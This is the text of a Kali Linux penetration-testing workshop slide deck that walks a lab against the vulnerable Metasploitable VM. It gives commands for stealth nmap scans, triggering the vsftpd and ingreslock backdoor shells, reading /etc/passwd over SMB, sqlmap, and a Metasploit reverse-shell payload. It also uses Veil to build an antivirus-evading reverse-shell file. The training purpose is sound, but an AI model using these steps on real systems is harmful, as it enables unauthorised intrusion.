3. Welcome
Tony Godfrey is the CEO / Linux Consultant
of Falconer Technologies (est 2003) specializing in
Linux. He has written several articles on the body
of knowledge of security administration, is a
regular contributor to a variety of Linux
publications, and has written technical content for
Linux education nation-wide at the college level.
He also teaches topics covering Linux,
Network Security, Cisco routers, Cybercrime and
System Forensics.
5. Who is Kali?
Kali the mother goddess despite her
fearful appearance, protects the good
against the evil. Unlike the other Hindu
deities her form is pretty scary and
formidable, intended to scare away the
demons both literally and figuratively!
Anu Yadavalli
7. What is Kali Linux?
Kali Linux is a Debian-derived Linux
distribution designed for digital forensics
and penetration testing. It is maintained
and funded by Offensive Security Ltd. It
was developed by Mati Aharoni and Devon
Kearns of Offensive Security through the
rewrite of BackTrack, their previous
forensics Linux distribution.
8. What’s on the DVD?
/books
◦Official Kali Guide
◦eForensics
/media
◦7-Zip, kali_iso, SD_formatter, Unetbootin,
USB_installer, VMware, Win32_DiskImager
/metaspolitable
/PPT
14. Getting Ready…
- Let‟s make a folder called kali_2014
- Copy the DVD contents into that folder
- Install 7-Zip
- Install VMware Player
Let‟s make sure the virtual environments are working and can „ping‟
each other
15. VMware Player
Press <CTRL><Alt> at the same time to
be released from the current virtual
environment. You can then do a normal
<Alt><Tab> to toggle between different
applications.
16. Logins / Passwords
Kali Login root
Kali Password password
Metaspolitable Login msfadmin
Metaspolitable Password msfadmin
17. Metaspolitable V/E
Login msfadmin
Password msfadmin
ifconfig
Jot down the IP & Netmask
route
Jot down the Gateway
19. Kali V/E
Login root
Password password
ifconfig
Jot down the IP & Netmask
route
Jot down the Gateway
20. Kali V/E
Go to:
Applications System Tools
Preferences System Settings
Display Resolution: ____
Then…[Apply]
21. Kali Updating
From the command line, type
apt-get update && apt-get upgrade
Note: This has already been done to save time, but should be done
after a new installation.
23. There are several categories
Top 10 Security Tools
Information Gathering
Vulnerability Analysis
Web Applications Password Attacks
Wireless Attacks Exploitation Tools
Sniffing/Spoofing Maintaining Access
Reverse Engineering
Stress Testing Hardware Hacking
Forensics Reporting Tools
System Services
26. ping
ping
Packet InterNet Groper
Port = 8
Establishes physical connectivity between two entities
(from Kali) ping <Target IP>
Did it echo back?
27. top
top
Tells us what services are running,
processes, memory allocation
Basically, a live system monitor
35. Can you ‘ping’ each other?
Virtual Environment #1 (Metaspolitable)
◦Go to TERMINAL
◦ifconfig
◦…jot this number down…
Virtual Environment #2 (Kali)
◦Go to TERMINAL
◦ifconfig
◦…jot this number down…
37. traceroute
traceroute
Essentially, „tracert‟ in Windows
traceroute –i eth0 <Target IP>
It displays the route (path) and measuring transit delays of packets
across an Internet Protocol (IP) network
38. nmap
nmap –p0-65535 <Target IP> | less
A security scanner used to discover hosts and services on a
computer network, thus creating a "map" of the network
39. nmap
nmap –sS –Pn –A <Target IP>
A security scanner used to discover hosts and services on a
computer network – „sS‟ is stealth scan, „Pn‟ not to run a ping scan,
and „A‟ is O/S detection, services, service pack.
40. rlogin (from Metaspolitable)
rlogin –l root <Target IP>
whoami
tcpdump -i eth0 host <Target IP>
A packet analyzer that runs under the command line. It allows the
user to intercept and display TCP/IP and other packets being
transmitted or received over a network to which the computer is
attached.
41. rpcinfo
rpcinfo –p <Target IP>
A utility makes a Remote Procedure Call (RPC) to an RPC server and reports
what it finds. It lists all programs registered with the port mapper on the
specified host.
42. showmount
showmount –e <Target IP>
showmount –a <Target IP>
It displays a list of all clients that have remotely mounted a file system from a
specified machine in the Host parameter. This information is maintained by
the [mountd] daemon on the Host parameter.
43. telnet
telnet <Target IP> 21
After '220...'
user backdoored:)
<CTRL><]>
quit
Port 20/21 is FTP
44. telnet
telnet <Target IP> 6200
After 'Escape character...',
id;
<CTRL><]>
quit
Port 6200 - Oracle Notification Service remote port Oracle Application Server
45. telnet
telnet <Target IP> 6667
IRC (Internet Relay Chat)
Many trojans/backdoors also use this port: Dark Connection Inside, Dark FTP,
Host Control, NetBus worm , ScheduleAgent, SubSeven, Trinity, WinSatan,
Vampire, Moses, Maniacrootkit, kaitex, EGO.
46. telnet
telnet <Target IP> 1524
After 'root@meta....',
id
Many attack scripts install a backdoor shell at this port (especially those
against Sun systems via holes in sendmail and RPC services like statd,
ttdbserver, and cmsd). Connections to port 600/pcserver also have this
problem. Note: ingreslock, Trinoo; talks UDP/TCP.
50. smbclient
smbclient //<Target IP>/tmp
Do you get the 'smb: >' prompt?
cd rootfs
cd etc
more passwd
Do you get a list of all user accts?
51. tcpdump
On Kali…
tcpdump –I eth0 src <Target IP>
On Metaspolitable…
ping www.yahoo.com
open a Browser & go to CNN.com
52. netdiscover
On Kali
netdiscover –i eth0 –r <Target IP>/24
Netdiscover is an active/passive address reconnaissance tool, mainly
developed for those wireless networks without DHCP server, when you are
wardriving. It can be also used on hub/switched networks.
53. nikto
On Kali
nikto –h <Target IP>
Its an Open Source (GPL) web server scanner which performs
comprehensive tests against web servers for multiple items, including over
6700 potentially dangerous files/CGIs, checks for outdated versions of over
1250 servers, and version specific problems on over 270 servers.
54. sqlmap
On Kali
sqlmap –u http://<Target IP> --dbs
It is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over of database
servers.
55. Wasp Services
From Kali – open IceWeasel
http://<Target IP>/
Research: Multillidae <p. 8>
The Mutillidae are a family of more than 3,000 species of wasps (despite the
names) whose wingless females resemble large, hairy ants. Their common
name ‘velvet ant’ refers to their dense pile of hair which most often is bright
scarlet or orange, but may also be black, white, silver, or gold.
56. Web Services
From Kali – open IceWeasel
http://<Target IP>/
Research: Multillidae <p. 8>
Mutillidae is a free, open source web application provided to allow security
enthusiest to pen-test and hack a web application
57. whatweb
From Kali
whatweb <Target IP>
whatweb –v <Target IP>
whatweb –a 4 <Target IP>
WhatWeb recognizes web technologies including content management
systems (CMS), blogging platforms, statistic/analytics packages, JavaScript
libraries, web servers, and embedded devices.
58. From Kali - msfconsole
Presentation on Kali Linux
59. msfconsole
From Kali
service postgresql start
service metasploit start
msfconsole
Let’s fire up the database (PostGreSql) – start Metasploit – start msfconsole
We will then take a look at the built-in exploit tools
60. msfconsole
From [msf>] console
help search
show exploits
search dns
‘Help Search’ shows all of the options, ‘Show Exploits’ show all the built-in
exploits in msfconsole, ‘Search DNS’ will look for any DNS exploits.
61. msfconsole
From [msf>] console
search Microsoft
search diablo
search irc
search http
Let’s try a few more to see what they do….
62. msfconsole
From [msf>] console, search for „unreal‟
info <exploit>
use <exploit>
show options
LHOST, RHOST, LPORT, RPORT
68. msfconsole
From [msf>] console, (target: Win XP)
set payload windows/shell_reverse_tcp
show options
set LHOST <Kali IP Address>
set RHOST <Target IP Address>
72. SHODAN
Let‟s run SHODAN
Open a browser
www.shodanhq.com
type in „almost anything‟
…Be very nervous…
73. FERN
Let‟s run FERN
Kali Linux
Wireless Attacks
Wireless Tools
fern-wifi-cracker
74. recon-ng
Kali has many built-in tools, but you
can always install more (Debian-based).
But, you may always wish to add more
such as recon-ng.
recon-ng
automated info gathering and
network reconnaissance.
75. recon-ng
Let‟s run recon-ng…
cd /opt/recon-ng
/usr/bin/python recon-ng
show modules
recon/hosts/gather/http/web/google_site
76. recon-ng
Let‟s run recon-ng…
set DOMAIN <domain.com>
run (…let this run awhile…)
back (…previous level…)
show modules
77. recon-ng
Let‟s run recon-ng…
use reporting/csv
run
Will add your new information to
/usr/share/recon-ng/workspaces/default
78. dmitry
If you want something more basic…dmitry
dmitry –s <domain.com>
It gives you site names & IP‟s
79. veil
Kali has many built-in tools, but you
can always install even more (Debian-
based). You may always wish to add more
such as veil.
veil
Remote shell payload generator
that can bypass many anti-virus
programs.
80. veil
Let‟s run veil
veil-evasion
list (available payloads list)
use 13 (powershell/VirtualAlloc)
generate
81. veil
Let‟s run veil
1 (msfvenom)
[ENTER] (accept default)
Value for LHOST (Target IP)
Value for LPORT (ex: 4000)
82. veil
Let‟s run veil
Output name (“Squatch”)
It will store this new batch file to
the /usr/share/veil/output/source
folder. When the file is run from the target
machine, it will attempt to do a reverse
shell session with Kali.
90. Kali in a box?
Do you want to run Kali on tablet or phone?
http://www.kali.org/how-to/kali-linux-android-linux-deploy/
91. Pentesting with Firefox?
The Firefox web browser is great tool to
test vulnerabilities of a website. There is a
portable version on PortableApps. I would
suggest this version and install the needed
plugins. Then, fire up the browser and „use
your powers for good‟.